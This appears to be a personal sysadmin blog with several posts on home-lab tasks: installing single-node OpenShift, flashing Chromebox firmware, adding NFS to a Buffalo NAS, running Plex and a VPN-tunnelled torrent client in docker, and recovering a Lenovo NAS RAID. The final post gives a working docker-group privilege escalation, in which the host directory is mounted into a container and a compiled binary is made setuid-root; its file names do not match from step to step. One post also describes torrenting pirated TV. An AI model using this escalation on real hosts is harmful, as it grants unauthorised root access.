Installing single-node OpenShift (SNO) on a bee-link GTR5

After working on the HP Chromebox G1 – I discovered that a single 32 GB DDR3 SODIMM was going to cost 3 times what the Chromebox itself cost me to begin with.  It quickly became evident my openshift experiment was going to be limited using the Chromebox, so I decided to try on another PC I had available, this was a bee-link GTR5.  In addition to the internal SSD, I also added a 1 TB NVME drive.

The chromebox G1’s might be possible to use as a microshift cluster but still waiting on the parts to really determine if that’s possible.

The GTR5 was previously used as a desktop machine running the i3 respin of Fedora.  First step was to back up everything and then off to the races with openshift.

I started out following this guide.

https://www.redhat.com/sysadmin/low-cost-openshift-cluster

Installation followed pretty closely, I’m only going to note any special steps I did on my side.

I’m running a pretty simple consumer grade router, but it let me configured the DHCP hostname – I set the GTR5 as “hive.geolaw.loc” and used that in the cluster details.

Cluster Name: hive
Base Domain: geolaw.loc

Copied my ssh .pub and then generated the discovery iso

DNS entries : like I said, I’ve got a cheap consumer class router, does not support adding DNS entries.
So on the machines I plan on accessing the web GUI or ‘oc’ –  I plan on just using the following /etc/hosts entries :

$ grep hive /etc/hosts
192.166.29.7 api.hive.geolaw.loc *.apps.hive.geolaw.loc api-int.hive.geolaw.loc

Booting the discovery.iso

I had an existing Ventoy USB drive that I first tried just dropping the iso file into the Ventoy partition – this did not boot properly for me and went to an emergency shell.  I then just used dd to write the discovery iso to the thumb drive:
$ sudo dd if=discovery_image_hive.iso of=/dev/sdb bs=1024

Once this finished I rebooted the GTR5 and from the UEFI level selected the USB to boot from.

After booting, the agent.service was failing due to it being unable to pull from the redhat.io registry:

Jun 22 14:26:26 hive podman[17680]: Error: initializing source docker://registry.redhat.io/rhai-tech-preview/assisted-installer-agent-rhel8:v1.0.0-264: unable to retrieve auth token: invalid username/password: unauthorized: Please login to the Red Hat Registry using your Customer Portal credentials. Further instructions can be found here: https://access.redhat.com/articles/3399531
Jun 22 14:26:29 hive podman[17749]: Trying to pull registry.redhat.io/rhai-tech-preview/assisted-installer-agent-rhel8:v1.0.0-264…

 

To fix this I ssh’d into the openshift installer, su’d to root, and then logged into to registry.redhat.io.  Once I logged in, I restarted the agent.service and away it went!

 

$ ssh core@hive
** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** **
This is a host being installed by the OpenShift Assisted Installer.
It will be installed from scratch during the installation.

The primary service is agent.service. To watch its status, run:
sudo journalctl -u agent.service

To view the agent log, run:
sudo journalctl TAG=agent
** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** **
Last login: Thu Jun 22 14:26:22 2023 from 192.168.29.16
[core@hive ~]$ sudo su –
Last login: Thu Jun 22 14:17:22 UTC 2023 on pts/0
[root@hive ~]# podman login registry.redhat.io
Authenticating with existing credentials for registry.redhat.io
Existing credentials are invalid, please enter valid username and password
Username (|uhc-pool-81ec5a21-635b-4c43-8409-63e45c46ad51): glaw@redhat.com
Password:
Login Succeeded!
[root@hive ~]# systemctl restart agent

The discovered host eventually popped up in the assisted installer and I was able to select my network and continue the install.

The host rebooted several times along the way as it was processing the install.

Watching the console I could see where it was pulling down the containers and starting them.

but again getting the registry errors and the containers going into a ImagePullBackOff state

Jun 22 15:42:07 hive kubenswrapper[2978]: E0622 15:42:07.423504 2978 pod_workers.go:965] “Error syncing pod, skipping” err=”failed to \”StartContainer\” for \”registry-server\” with ImagePullBackOff: \”Back-off pulling image \\\”registry.redhat.io/redhat/certified-operator-index:v4.13\\\”\”” pod=”openshift-marketplace/certified-operators-bb2nx” podUID=0f76c0fa-cb11-436f-9e7e-77357117b313

 

I tried doing the podman register again, as root, as core, as containers .. no bueno 🙁

 

Oh well, good first test, will have to retry later.

Adventures with HP Chromebox Pt1

In my daytime job, I support ODF and CEPH.

I recently picked up 3 refurbished HP Chromebox G1s for $49 each with hopes of creating a mini local ODF cluster ala https://www.redhat.com/sysadmin/low-cost-openshift-cluster

https://www.amazon.com/gp/product/B00URW6WEY/

System specs –
CPU  – Intel Core I7 I7-4600U 2.10 Ghz
4 GB RAM DDR3

First step was going to be able to install linux
I started following this guide
https://rianoc.github.io/2020/04/19/Linux-Chromebox/ and then the links provided within

1) First step was enabling “Developer mode” which links to https://wiki.galliumos.org/Installing/Panther#Enable_Developer_Mode_and_Boot_Flags

a) first boot after reset
This worked as described except I was using a logitech wireless keyboard/mouse combo.  The ctrl-d from the wireless keyboard was not being accepted.  Having had issues previously with recovery on a mac mini which only saw wireless keyboards on the innermost  rear USB port, I tried the dongle in both the front and back USB ports.  I had to pull out a wired USB keyboard and CTRL-D was accepted right away.

b) trying to “sudo crossystem dev_boot_legacy=1” from the terminal window.

Try as I might, sudo was prompting me for a password, which went against almost every set of instructions I found.  CTRL-ALT-T for a terminal, “shell”, then “sudo crossystem dev_boot_legacy=1“.  First pass I had logged in using my google id – I have a gsuite (aka google apps) account for geolaw.com. This showed a “this device is managed by geolaw.com” – so I was not sure if possibly that was blocking me from getting into sudo, so I rebooted and when it prompted me that “OS verification is off”, I turned it back on and repeated the developer mode.

Second time around, after it reset and re-enabled developer mode.

At the “Welcome!” screen, I clicked “enable debugging features”.  From there it prompted me to set a root password.  First time around, I set a password, second time, no password.  I just clicked “Enable” and then “OK”.  Back to the “Welcome!” screen, I clicked “Let’s go >”.  From “Connect to network”, I clicked “Next” since I was connected via ethernet.  Google Chrome OS terms, clicked “Accept and Continue”. After a short “Checking for updates”, it prompted me to “Sign in to your Chromebox”.   I used “Browse as a Guest” at the bottom, I was still unable to “sudo crossystem dev_boot_legacy=1” as it kept prompting me for a password.

What finally worked was CTRL-ALT-F2 (using the wired keyboard) and then logged in as “root” with the password of “test0000”.  From there, I gave the command “crossystem dev_boot_legacy=1” (I was root, so no sudo needed).  I also gave the command “chromeos-setdevpasswd” to set the chronos password since the next step also required sudo 🙂

CTRL-ALT-F1 took me back to the GUI where I still had the terminal window open there.
cd;curl -LO https://mrchromebox.tech/firmware-util.sh && sudo bash firmware-util.sh

Note – the rianoc github link above shows he used option 3 for “3) Install/Update Full ROM Firmware”
When I ran this June 16th, 2023, this was option 2.

DUH! I forgot to remove the screw to enable the firmware update.

After shutting down and removing the firmware screw, I rebooted.  Note, after the reboot, the firmware-util.sh file did not persist (I was in a guest login after all).  After running the script, I chose “2” .  It prompted me to back up the current stock firmware, which I did to a USB thumb drive, then it downloaded and flashed the firmware to the device.

“R” to reboot and Immediately I could see the difference as the google boot screen was replaced with a rabbit logo.  there was no boot device.  “Booting from ‘SATA: LITEON IT LST-16S9G-HP ‘ failed: verify it contains a 64-bit UEFI OS.”

Step 1 done, now to track down a coreos image for this device 🙂

Adding NFS to my Buffalo LinkStation

I’ve bought a second hand Buffalo LinkStation several years ago off ebay and although its not the most powerful NAS unit, it still serves the basic purpose of file sharing.  I also own a Lenovo ix2-dl and the one complaint I have about the buffalo unit is there is no NFS built in.  Years ago I had hacked in some other firmware but after having to reset the NAS, it defaulted back to the cifs only firmware.

  1. First step was to get in via ssh – Done using the acp_commander java code – https://advanxer.com/blog/2013/02/buffalo-linkstation-acp-commander-gui/
    1. After enabling ssh, I had to configure my .ssh/config like so to connect due to older ssh ciphers :Host buffalo-nas
      user root
      hostname 192.168.29.10
      KexAlgorithms diffie-hellman-group1-sha1
      PubkeyAcceptedKeyTypes +ssh-rsa
  2. Then I copied over my ssh keys :
    # ssh-copy-id root@buffalo-nas
  3. This stuff survives a reboot because the root home directory all lives on /, however, since the ipkg package manager and the packages it installs live on /opt, which does not exist as part of the default OS, as soon as the NAS reboots, it loses NFS every time.
  4. Next step  install ipkg – the instructions from here worked fine
    (https://github.com/skx/Buffalo-220-NAS)
    run the following to retreive the list of available packages.
    # ipkg update
  5. From here, there are several nfs packages available.   despite the note not to use it, unfs3 finally worked for me
    # ipkg install unfs3
  6.  Then configure nfs … create my exports with my shares
    # cat /opt/etc/exports
    /mnt/array1/Pictures 192.168.29.0(rw,sync)
    /mnt/array1/Music 192.168.29.0(rw,sync)
    /mnt/array1/storage 192.168.29.0(rw,sync)Then kill/restart nfs :
    # /opt/etc/init.d/S56unfsd
  7. Then I was able to see all the mounts and mount these from my newer fedora 35 and Ubuntu 21.10 machines$ showmount -e buffalo-nas
    Export list for buffalo-nas:
    /mnt/array1/storage 192.168.29.0
    /mnt/array1/Music 192.168.29.0
    /mnt/array1/Pictures 192.168.29.0
  8. Add to /etc/fstab
    # cat /etc/fstab |grep Pictures
    192.168.29.10:/mnt/array1/Pictures /Pictures nfs defaults,noatime,vers=3 0 0
  9. And mount
    # sudo mount /Pictures

 

Alternately, after setting up ssh and ssh keys, i finally rewrote this process as an ansible playbook [1]

The python installed on the linkstation is old, 2.6 and does not have zlib or pip or anything extra installed. You can force Anisble not to use zlib with the following config option :

$ cat ansible.cfg
[defaults]
module_compression = ‘ZIP_STORED’

$ cat hosts
[buffalo]
buffalo-nas

And then its just a matter of running the playbook:

# ansible-playbook -v -v -v -i hosts buffalo.yml

The playbook is fairly well commented with plenty of checks –

1 – Playbook : buffalo.yml

 

 

bit torrent in a docker container with VPN

I cut the cord on cable years ago and have been relying on SABnzbd + Sickbeard/Sonarr to grab all of my TV shows off usenet.  Occasionally, Sickbeard/Sonarr will miss an episode and by the time I go back to start looking for it, it is long gone on Usenet. This leaves me either dependent on watching the show “on demand” which means commercials or once in a while I will have to reach out to the pirate bay and bit torrent a copy which I usually try to avoid doing.

On the rare occasion I’ve had to do this in the past, the one time I forgot to check if my VPN was up and running, I get a nasty gram in the mail from ATT a few weeks later because apparently HBO was monitoring the torrent downloaders 😉

Enter docker – https://github.com/haugene/docker-transmission-openvpn/

Turns out this was so easy I don’t know why I did not look at doing it before.

My docker-compose.yml file  – direct from the github except for the last line:

version: ‘3.3’
services:
transmission-openvpn:
cap_add:
– NET_ADMIN
volumes:
– ‘/Downloads2/:/data’
environment:
– OPENVPN_PROVIDER=PIA
– OPENVPN_CONFIG=ca_montreal,ca_ontario,ca_toronto,ca_vancouver
– OPENVPN_USERNAME=XXXXX
– OPENVPN_PASSWORD=XXXXX
– LOCAL_NETWORK=192.168.0.0/16
– PUID=1000
logging:
driver: json-file
options:
max-size: 10m
ports:
– ‘9091:9091’
image: haugene/transmission-openvpn
restart: unless-stopped

I added the last line to make sure this always auto started when the host machine rebooted.

Coupled with a bash script to check the VPN this works perfectly

runs via cron every 10 minutes and makes sure the docker container’s IP is not the same as the host machines ip (e.g. VPN is up and running)

#!/bin/bash

function check {
     # hack to make sure docker container is using VPN
     ATT_IP=$(curl -s http://ipinfo.io/ip);

     # transmission container
     TID=$(docker ps |grep trans |awk ‘{print $1}’);
     TRANS_IP=$(docker exec -it $TID /bin/bash -c “curl -s http://ipinfo.io/ip”)
}

check
i=”0″
echo $ATT_IP
echo $TRANS_IP
while [ $i -lt 5 ]; do

     if [ “$ATT_IP” == “$TRANS_IP” ]; then
          echo “uh oh, docker running on ATT IP restarting and retrying in 60 seconds”
          docker restart $TID
          i=$[$i+1]
          sleep 60
          check
     else
          echo “we’re good, docker running on VPN IP $TRANS_IP”
          exit;
     fi
done

 

 

Moving Plex to docker

I’ve been running plexmediaserver on my linux rigs for several years now but recently started moving several of my home media services over to docker images.

With a little help from this docker compose yml : https://hub.docker.com/r/linuxserver/plex

I was able to do this fairly quick and painlessly with (nearly) zero down time while retaining all of my historical plex data with my libraries all fully intact.  Hopefully this helps make my plex more portable 🙂

My plex setup has my TV shows on /TV/TV/ and my Movies on /TV/Movies – these are both on a NFS share coming off my qnap NAS. Files are all owned by my user “glaw” (UID 1000) and group “users” (GID 100).

First step was to prep the docker compose file

$ cat docker-compose.yml

version: “2.1”
services:
plex:
image: ghcr.io/linuxserver/plex
container_name: plex
network_mode: host
environment:
– PUID=1000
– PGID=100
– VERSION=docker
– PLEX_CLAIM=claim-SyGiy3XXXXXXXXXX
volumes:
– /var/lib/plexmediaserver:/config
– /TV/TV:/TV/TV
– /TV/Movies:/TV/Movies
restart: unless-stopped

Since my media lives out as sub directories under /TV (capitalized), I adjusted the volumes to also reflect the capitalization. The first time around, with /tv and /movies, none of my media was playing.

I got the PLEX_CLAIM token from https://plex.tv/claim – just before I did the docker-compose up down below. The claim token is only good for 4 minutes.

Second I stopped and disabled plexmediaserver on my main linux rig. (SS is an alias to sudo systemctl)

# SS stop plexmediaserver
# SS disable plexmediaserver

Third, make a backup copy of all of my plex data and then chown it so the PUID/PGID in the docker container matches.

# sudo cp -r /var/lib/plexmediaserver /var/lib/plexmediaserver.sav
# sudo chown -R glaw:users /var/lib/plexmediaserver

Next I brought up the docker image. The first time it pulled down all of the docker layers and then started up plex. Each additional time it just recreates the same image since all of the layers are already present.

# docker-compose up

Pulling plex (ghcr.io/linuxserver/plex:)…
latest: Pulling from linuxserver/plex
1f5e15c78208: Pull complete
a8bf534b5e6e: Pull complete
e633a0fa06b1: Pull complete
e26072cac69d: Pull complete
57c07b9b6c59: Pull complete
b2d9d0061554: Pull complete
ec31a11d59ba: Pull complete
43c725c27329: Pull complete
Digest: sha256:f92f4238cd7bc72ba576f22571ddc05461a2467bc0a1a5dd41864db7064d6fa6
Status: Downloaded newer image for ghcr.io/linuxserver/plex:latest
Creating plex … done
Attaching to plex
plex | [s6-init] making user provided files available at /var/run/s6/etc…exited 0.

Lastly, I rebooted the host machine and verified all docker containers were running :

# docker ps
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
1760b65b5108 haugene/transmission-openvpn “dumb-init /etc/open?” About a minute ago Up 57 seconds (health: starting) 0.0.0.0:9091->9091/tcp transmission_transmission-openvpn_1
1f35aae81c73 ghcr.io/linuxserver/plex “/init” 24 minutes ago Up 2 minutes plex
c165f0c9d947 ghcr.io/linuxserver/jackett “/init” 24 hours ago Up 2 minutes 0.0.0.0:9117->9117/tcp jackett

The final test was to turn off wifi on my cell phone and verify I could still get to my home plex just as if plexmediaserver were still running natively on the host machine.

Lenovo ix2-dl corrupted firmware

What a pain in the $%^&*( ass.

Lenovo has no concept of using a md5 checksum on a file to confirm its integrity before you flash it and end up with a corrupted NAS like me.

AND to top it off, Lenovo support only offers a destructive way to reflash the NAS, double %^&*()^& in the ass.

So, initially I thought the drives were set up as a zfs disk set – installed the zfs needed debs on my debian jessie system only to find out all the lenovo disk set is is a linux md raid set, so  (pulling this from my bash history)

Disk /dev/sdd: 1.8 TiB, 2000398934016 bytes, 3907029168 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 4096 bytes
I/O size (minimum/optimal): 4096 bytes / 4096 bytes
Disklabel type: gpt
Disk identifier: 276C4C51-BFA8-4E33-AB51-FC7033AA6D56

Device Start End Sectors Size Type
/dev/sdd1 65536 42008575 41943040 20G Microsoft basic data
/dev/sdd2 42008576 3907028991 3865020416 1.8T Microsoft basic data

Once I figured out it was just a md linux raid set, it was easy peasy to import :

root@dell:~# mdadm –assemble –run /dev/md1 /dev/sdd2
mdadm: /dev/md1 has been started with 1 drive (out of 2).

# DOH! no lvm2 installed on the system
root@dell:~# mount /dev/md1 /mnt
mount: unknown filesystem type ‘LVM2_member’
root@dell:~# pvscan
-su: pvscan: command not found
root@dell:~# apt-get install lvm2

pvscan, vgscan, and lvscan bought it LV into devicemapper

root@dell:~# pvscan
PV /dev/md1 VG bad2c48_vg lvm2 [1.80 TiB / 0 free]
Total: 1 [1.80 TiB] / in use: 1 [1.80 TiB] / in no VG: 0 [0 ]
root@dell:~# vgscan
Reading all physical volumes. This may take a while…
Found volume group “bad2c48_vg” using metadata type lvm2
root@dell:~# lvscan
ACTIVE ‘/dev/bad2c48_vg/lv3140cc7e’ [1.80 TiB] inherit

Mounted it up,
root@dell:~# sudo mount /dev/bad2c48_vg/lv3140cc7e /mnt

bingo – now I can find 1.8TB worth of space elsewhere to rsync all that %^&*( data off
so I can follow Lenovo’s destructive NAS rebuild.

—————————————————————–
Update 07/01/2017
I got an email from a guy who had a 4 drive Lenovo PX4-300R NAS with a RAID 5 array set up.
He also had very little experience with Linux.

This is the rough process that worked for him

1. First, download ubuntu and burn it to a usb drive or cd  http://ubuntu.com and then get it on to a USB drive. https://wiki.ubuntu.com/Win32DiskImager/iso2usb

2. pull your drives from the NAS one at a time, I am not sure if there is anything that designates the first disk, second disk, etc, I think left to right in mine if I remember correctly but make sure to label them.

3. prepare the PC you will be booting from, connect the 4 sata cables/drives in order or at least first guess.   boot up to the flash drive — note, if you are playing with a UEFI machine you may need to disable secure boot.  ubuntu will start automatically and should pop up asking if you want to try or install. click “try”
4. right click on the desktop and open terminal. commands below are prefixed by # or $ for readability, don’t type the # or $
ubuntu@ubuntu:~$ sudo su – 
5. Get a list of the disks :
     root@ubuntu:~# fdisk -l
You should see your 4 identical disks, should be obvious based on their size :

I had 2 x 1.8TB drives, set up in a raid1 and since the disks are complete mirrors of each other, I could access the data with just a single disk.

My disk in question showed up like this :

Disk /dev/sdd: 1.8 TiB, 2000398934016 bytes, 3907029168 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 4096 bytes
I/O size (minimum/optimal): 4096 bytes / 4096 bytes
Disklabel type: gpt
Disk identifier: 276C4C51-BFA8-4E33-AB51-FC7033AA6D56

Device Start End Sectors Size Type
/dev/sdd1 65536 42008575 41943040 20G Microsoft basic data
/dev/sdd2 42008576 3907028991 3865020416 1.8T Microsoft basic data

Make a note of the devices that correlate to your NAS drives … your first disk (could be your windows disk if you leave your windows drive connected), it may be /dev/sda, the second is /dev/sdb, /dev/sdc, … /dev/sdd  etc.  the usb drive might also be a /dev/sd* drive

6.  This guy reported back to me that mdadm was not included on the default ubuntu livecd , so install it

# apt install mdadm
7. Assemble the raid – Using /dev/sdd from my blog….
/dev/sdd1 above is I’m guessing something specific to the lenovo set up
/dev/sdd2 above is there the data lives.
So once you identify your drives, for example here I will assume /dev/sdb, /dev/sdc, /dev/sdd and /dev/sde … you should see the 2 partitions like /dev/sdd1 and /dev/sdd2 above for each (/dev/sdb1 and /dev/sdb2, /dev/sdc1 and /dev/sdc2, /dev/sdd1 and /dev/sdd2, /dev/sde1 and /dev/sde2

The “2” partition should all be used in the linux md array … so something like this :

root@ubuntul:~# mdadm –assemble –run /dev/md1 /dev/sdb2 /dev/sdc2 /dev/sdd2 /dev/sde2 

If this works, you should get something like :

mdadm: /dev/md1 has been started with 4 drives (out of 5).

8. If not, the disks may be in the wrong order.  You *may* be able to just tweak the command and give them in reverse order. ala

root@ubuntul:~# mdadm –assemble –run /dev/md1 /dev/sde2 /dev/sdd2 /dev/sdc2 /dev/sdb2 
You want to shoot for the “mdadm: /dev/md1 has been started….” output
If you can get there, you should be able to use the following to scan in the logical volume(s) off the RAID5
9.  Load in the lvols
root@dell:~# pvscan
PV /dev/md1 VG bad2c48_vg lvm2 [1.80 TiB / 0 free]
Total: 1 [1.80 TiB] / in use: 1 [1.80 TiB] / in no VG: 0 [0 ]
root@dell:~# vgscan
Reading all physical volumes. This may take a while…
Found volume group “bad2c48_vg” using metadata type lvm2
root@dell:~# lvscan 
ACTIVE ‘/dev/bad2c48_vg/lv3140cc7e’ [1.80 TiB] inherit
^^^^^^^^^^^^^^^^^^^^^^^^^^^ – this is your logical volume name
You could realistically get multiple volume groups and logical volumes, depending on how the nas slices up the array
Mounted it up, -o ro mounts as “read only”  – so you’re not changing anything on it … just to copy off.
root@dell:~# mount -o ro /dev/bad2c48_vg/lv3140cc7e /mnt
then you can use this command to list you your files :
root@ubuntu:~# ls -la /mnt
10. From here he was able to plug in another USB drive to recover his data to, then using the “Files” icon on the side bar, copy from /mnt to the USB drive.
Update – 2022
Shut down my linkstation today but used this same concept to add the first disk into a linux machine,
then rsync data from another smaller md raid array with a failed disk to the 3TB disk and then hopefully,
stop the first md raid and insert the second disk and then ??? hopefully be able to bring up the new
mdarray.

Updating a Raspberry Pi 2 boot disk to a Raspberry Pi 3

This is just the real basics as I figured out and a work in progress.  I have not really figured out yet what wireless network driver that needs to be added to a Pi2 image to make it see the embedded Pi3 wireless network, but using a wired ethernet it at least gives me the option to capture some code off a distributed Pi2 image so it can be dropped onto a fresh install of 2016-05-27-raspian-jessie.

So in the example, I am using the ProxyMagic image for a Raspberry Pi 2 and want to drop the code onto a newer Pi3 Raspbian image.

  1. Download the latest raspbian image – I am using the debian jessie version dated May 27th 2016 from https://www.raspberrypi.org/downloads/raspbian/
  2. Unpack the .zip to expand to the .img file 2016-05-27-raspbian-jessie.img
  3. View the disk contents – this shows 2 partitions, the 63MB MSDOS boot partition and the 3.7GB linux partition
    $> fdisk -lu 2016-05-27-raspbian-jessie.img

    Disk 2016-05-27-raspbian-jessie.img: 3.8 GiB, 4019191808 bytes, 7849984 sectors 
    Units: sectors of 1 * 512 = 512 bytes 
    Sector size (logical/physical): 512 bytes / 512 bytes 
    I/O size (minimum/optimal): 512 bytes / 512 bytes 
    Disklabel type: dos 
    Disk identifier: 0x14c20151 
    Device                          Boot  Start     End   Sectors  Size Id   Type 
    2016-05-27-raspbian-jessie.img1        8192  137215    129024   63M  c    W95 FAT32 (LBA)
    2016-05-27-raspbian-jessie.img2      137216 7849983   7712768  3.7G 83    Linux
    
  4. Copy this off to a 8GB microSD card  – my sdcard came in as /dev/sdd – you can check your dmesg output after inserting your card to get the device.
    $> sudo dd if=2016-05-27-raspbian-jessie.img of=/dev/sdd
  5. As soon as the dd completes, my linux file manager (nemo) refreshed with the “boot” partition and a 3.7GB Volume.  I can click on each to mount them in userspace – ie, the mount as /media/glaw/boot and /media/glaw/<some big long UID>
  6. In a terminal window, I did a cd to the sdcard ext4 mount  and wiped everything out
    $> cd /media/glaw/fc254b57-8fff-4f96-9609-ea202d871acf
    $> sudo rm -rf *
    $> sudo sync
  7. Now to mount up the ProxyMagic image to copy the files over.  I’ve read about how you can calculate the total sectors offset based on the start # and the sector size and then specify the offset when doing a loop back mount, but found that kpartx does the trick very well.
    $> kpartx -v -a ProxyMagic-RPI-v1.img
    add map loop2p1 (253:0): 0 114688 linear /dev/loop2 8192
    add map loop2p2 (253:1): 0 5662720 linear /dev/loop2 122880
  8. Up pops an authentication window asking for sudo rights to mount the new boot file system – it should mount as /media/glaw/boot1 and then click on the 2.9GB volume to mount.S05NLP~U
  9. Locate the other

Sofa pictures

As shown, it looks like there is a gap in the back, but the 2 main sections were not “joined” in these pictures – there is a metal brace that slides into the bottom of the sections to join them – no gap when its fully assembled

looking at sofa, front left corner where the cats have scratched it.

whole thing assembled takes up about 9 ft x 9 ft 2 main pieces are about 7.5 ft x 3 ft x 3ft

back left corner, also some cat scratches

right back corner, didn’t realize it came out this blurry – similar to the other back corner.

front right arm

not sure what the stain is from, there’s a couple other small stains here and there.

center cushion – I do not believe the marks are stains – just from something sitting on the cushion while stored in the garage

Open Sourcing my Hackintosh ;)

Running a HP SPP mini tower with Yosemite installed and finally getting tired of finder and iTerm. Don’t get me wrong, I like iTerm, but from my linux background, my fingers just know terminator so much better 🙂

I tried installing terminator via brew but it did not seem very stable – I opened up a 4-up terminator view and after the icon spun for 5 minutes, it crashed.

Fink seems to be much more stable and integrates its programs right into XQuartz where the brew installed version popup’d a separate python window.

1. install fink:  bash script to do it all for ya https://raw.githubusercontent.com/fink/scripts/master/srcinstaller/Install%20Fink.tool

2. fink install terminator

3. fink install nautilus

4. Setup dbus for OSX :

sudo launchctl load -w /sw/share/dbus/launchd/org.finkproject.dbus-session.plist

launchctl load -w /sw/share/dbus/launchd/org.finkproject.dbus-session.plist

 

Screen Shot 2016-03-20 at 8.17.54 PM

Serious docker root exploit

I was amazed at how easy this was.  I found a couple different websites that lead me to this, giving credit where credit is due

1. http://yatb.giacomodrago.com/en/post/10/shutdown-linux-system-from-within-php-script.html

2. http://reventlov.com/advisories/using-the-docker-command-to-root-the-host

So putting 1 and 2 together.  I have my docker install running as the “docker” user, so no “sudo” required.  All I did (as docker) is :

1. Create the following snippet of C code shutdown_suid.c :
docker $> vi shutdown_suid.c
include <stdlib.h>
include <unistd.h>

int main() {
setuid(0);
system(“/sbin/shutdown -h now”); /* change this to the actual location of shutdown */
return 0;
}

2. Compile it :docker $> gcc -o shutdown_setuid shutdown_setuid.c

3. Exploit docker to mount the current directory and set rebuild_setuid to be owned as root and turn on the setuid permissions :
docker $> docker run -v $PWD:/stuff -t dockerdev/rhel /bin/bash -c ‘chown root.root /stuff/reboot_setuid && chmod a+s /stuff/reboot_setuid’

4. docker $> ls -la shutdown_setuid
-rwsrwsr-x. 1 root root 6623 May 29 11:54 shutdown_setuid